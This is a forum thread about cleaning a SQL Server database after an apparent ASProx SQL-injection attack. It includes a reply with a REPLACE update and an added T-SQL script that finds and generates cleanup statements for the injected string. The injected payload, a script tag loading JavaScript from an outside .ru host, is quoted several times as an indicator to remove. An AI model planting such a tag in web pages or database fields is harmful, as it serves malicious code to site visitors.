Author |
Topic |
dd97
Starting Member
1 Post |
Posted - 2010-11-12 : 10:42:25
|
Hello everyone! 1st time poster here.

I think my database has been compromised by the ASProx botnet. I was going through the import data wizard and all the values for the type field had this string appended to them: "<script src=http://www.bywd.ru/js.js></script>"

Here is a screenshot of this: http://tinyurl.com/2a7jww7

So I did a few Google searches and found this article: http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

It was very helpful b/c it explained how it happened and how to do a better job of preventing it, but I still don't really know how to rid my database of this junk. I couldn't find any rows in my tables with '%<script>%' in them. And I don't see that script reference in any of my webpages either. So maybe the attack failed or it is very well hidden.

If anyone here can help me I would be very appreciative!

Thanks for reading and have a great day. |
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2010-11-12 : 17:36:37
|
update table1
set col1 = replace(col1, '<script src=http://www.bywd.ru/js.js></script>', '')

N 56°04'39.26"
E 12°55'05.63" |
|
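A database-wide search for the injected string, as an added example that is not part of the original thread (T-SQL, assuming SQL Server 2005 or later; the `#hits` table and the variable names are this example's own). It matches the full marker literally, which a pattern like '%<script>%' does not because the injected tag reads `<script src=...`, and it generates one cleanup UPDATE per affected column without executing any of them.

```sql
-- Added example: list every string column that contains the injected marker
-- and generate (not run) a cleanup statement for each one.
SET NOCOUNT ON;

DECLARE @marker nvarchar(200);
SET @marker = N'<script src=http://www.bywd.ru/js.js></script>';  -- string from the post

CREATE TABLE #hits (tbl nvarchar(520), col nvarchar(260), type_name sysname, hit_count int);

DECLARE @tbl nvarchar(520), @col nvarchar(260), @type sysname, @sql nvarchar(max);

-- Every character-typed column of every user table in the current database
DECLARE col_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT QUOTENAME(c.TABLE_SCHEMA) + N'.' + QUOTENAME(c.TABLE_NAME),
           QUOTENAME(c.COLUMN_NAME), c.DATA_TYPE
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext');

OPEN col_cur;
FETCH NEXT FROM col_cur INTO @tbl, @col, @type;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- CHARINDEX is a literal match, so no LIKE wildcards need escaping;
    -- the CAST lets the same test work on text/ntext columns.
    SET @sql = N'INSERT INTO #hits SELECT @t, @c, @ty, COUNT(*) FROM ' + @tbl
             + N' WHERE CHARINDEX(@m, CAST(' + @col + N' AS nvarchar(max))) > 0'
             + N' HAVING COUNT(*) > 0;';
    EXEC sp_executesql @sql,
         N'@t nvarchar(520), @c nvarchar(260), @ty sysname, @m nvarchar(200)',
         @t = @tbl, @c = @col, @ty = @type, @m = @marker;
    FETCH NEXT FROM col_cur INTO @tbl, @col, @type;
END
CLOSE col_cur;
DEALLOCATE col_cur;

-- Affected columns, with the UPDATE to review and run for each
SELECT tbl, col, type_name, hit_count,
       N'UPDATE ' + tbl + N' SET ' + col + N' = REPLACE(CAST(' + col
       + N' AS nvarchar(max)), N''' + REPLACE(@marker, N'''', N'''''')
       + N''', N'''') WHERE CHARINDEX(N''' + REPLACE(@marker, N'''', N'''''')
       + N''', CAST(' + col + N' AS nvarchar(max))) > 0;' AS cleanup_sql
FROM #hits
ORDER BY hit_count DESC;

DROP TABLE #hits;
```

An empty result set means no character column in the current database still holds the marker. Take a backup before running any of the generated statements.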